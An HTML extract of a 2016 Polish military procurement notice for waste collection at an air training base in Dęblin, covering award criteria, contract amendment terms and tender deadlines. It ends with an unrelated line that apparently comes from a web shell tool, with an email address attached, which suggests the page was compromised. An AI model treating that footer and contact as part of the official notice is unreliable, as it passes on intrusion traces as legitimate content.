<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin odbioru odpadów w szczególnych przypadkach (poza harmonogramem) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą być dokonywane w zakresie dopuszczonym przez ustawę Prawo zamówień publicznych, wymagają zgodnej woli stron oraz zachowania formy pisemnej 
w postaci aneksu, pod rygorem nieważności w poniższym zakresie: 
1)Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba  w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków
2)gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub nowelizacji przepisów określonych w szczególności w § 5 umowy) lub z innych przyczyn 
o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę wymogów lub konieczne będzie spełnienie wymogów dodatkowych; 
3)wartość umowy może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT, w zakresie wynikającym z tej zmiany
4)Zamawiający zastrzega sobie prawo do zmiany harmonogramu odbioru  odpadów z uwagi na jego bieżące potrzeby (w sytuacji, kiedy w toku realizacji umowy okaże się, że ustalona w harmonogramie częstotliwość odbioru odpadów okaże się niewystarczająca lub nadmierna, w szczególności z uwagi na wyłączenie 
z użytkowania któregokolwiek z wymienionych w § 1 ust. 2 kompleksów, administrowanych przez Zamawiającego, bądź też poszczególnych obiektów wchodzących w ich skład bądź też zwiększenie ilości wytwarzanych odpadów na skutek zwiększenia stanu osobowego, osiągania wyższych stanów gotowości bojowej, szkolenia poligonowego, szkolenia rezerw osobowych, likwidacji klęsk żywiołowych lub innych obowiązków nałożonych prze organ władzy państwowej)
5)Zamawiający zastrzega sobie również prawo do zmiany miejsc ustawienia pojemników przeznaczonych do magazynowania wszystkich rodzajów odpadów, określonych w Wykazie miejsc postoju pojemników na odpady komunalne niesegregowane i segregowane wraz z planowanym harmonogramem ich odbioru w ramach danego kompleksu
6)Zamawiający zastrzega sobie prawo do zmiany ilości i typów pojemników przeznaczonych do gromadzenia wszystkich typów odpadów, o których mowa 
w § 2 ust. 2
7) Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w zakresie zmiany Zamawiającego w przypadku zmian organizacyjnych polegających na reorganizacji, z której będzie wynikało, iż obowiązki Zamawiającego przejmie inna jednostka organizacyjna resortu Obrony Narodowej na zasadach określonych w Kodeksie Cywilnym (cesja praw i obowiązków)
8)zmiany w umowie spowodowane zmianami w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem umowy, które nastąpiły po dniu zawarcia umowy. 
9)zmiany siedziby lub nazwy firmy Wykonawcy Zamawiającego;
10)zmiany strukturalne (przekazanie kompleksu poza resort obrony narodowej), których nie można było przewidzieć w chwili zawarcia umowy  i wynikające 
z nich zmniejszenie zakresu usługi</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. 41blsz.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41 Baza Lotnictwa Szkolnego, 08 - 521 Dęblin, Lotnisko bud. 205 (sekcja zamówień publicznych pok. 302 - 3 piętro, w godz. 7.30-15.30 lub pocztą po wpłacie 20,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2016 godzina 12:00, miejsce: 41 Baza Lotnictwa Szkolnego, 08 - 521 Dęblin,ul. Brygady Pościgowej 5, budynek Nr 226, pokój nr 7 (Kancelaria Jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com